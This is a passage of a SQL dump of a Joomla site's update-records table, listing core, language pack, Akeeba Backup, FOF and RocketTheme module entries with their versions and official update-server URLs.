package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2689,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2690,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2691,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2692,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2693,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2694,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2695,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2696,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2697,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2698,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2699,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2700,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2701,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2702,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2703,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2704,3,0,'French','','pkg_fr-FR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2705,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2706,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2707,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2708,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2709,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2710,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2711,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2712,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2713,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2714,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2715,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2716,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2717,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2718,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2719,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2720,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2721,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2722,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2723,3,0,'English US','','pkg_en-US','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2724,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2725,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2726,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2727,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2728,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2729,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2730,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2731,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2732,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2733,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2734,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2735,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2736,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2737,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2738,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2739,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2740,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2741,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2742,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2743,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2744,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2745,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2746,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2747,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2748,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2749,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2750,57,0,'French','','pkg_fr-FR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2751,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2752,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2753,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2754,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2755,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2756,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2757,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2758,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2759,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2760,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2761,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2762,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2763,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2764,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2765,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2766,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2767,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2768,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2769,57,0,'English US','','pkg_en-US','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2770,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2771,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2772,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2773,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2774,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2775,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2776,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2777,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2778,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2779,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2780,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2781,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2782,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2783,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2784,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2785,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2786,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2787,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2788,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2789,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2790,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2791,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2793,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(2794,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2795,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2796,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2797,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2798,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2799,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2800,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2801,3,0,'French','','pkg_fr-FR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2802,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2803,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2804,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2805,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2806,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2807,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2808,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2809,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2810,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2811,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2812,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2813,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2814,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2815,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2816,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2817,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2818,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2819,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2820,3,0,'English US','','pkg_en-US','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2821,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2822,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2823,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2824,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2825,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2826,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2827,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2828,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2829,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2830,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2831,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2832,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2833,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2834,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2835,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2836,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2837,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2838,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2839,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2840,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2841,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2842,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2843,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2844,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2845,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2846,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2847,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2848,57,0,'French','','pkg_fr-FR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2849,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2850,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2851,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2852,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2853,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2854,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2855,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2856,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2857,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2858,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2859,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2860,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2861,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2862,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2863,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2864,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2865,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2866,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2867,57,0,'English US','','pkg_en-US','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2868,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2869,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2870,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2871,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2872,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2873,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2874,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2875,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2876,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2877,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2878,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2879,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2880,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2881,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2882,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2883,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2884,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2885,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2886,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2887,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2888,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2889,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2891,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(2892,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2893,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2894,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2895,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2896,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2897,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2898,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2899,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2900,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2901,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2902,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2903,67,0,'Akeeba Backup Core package','Akeeba Backup Core 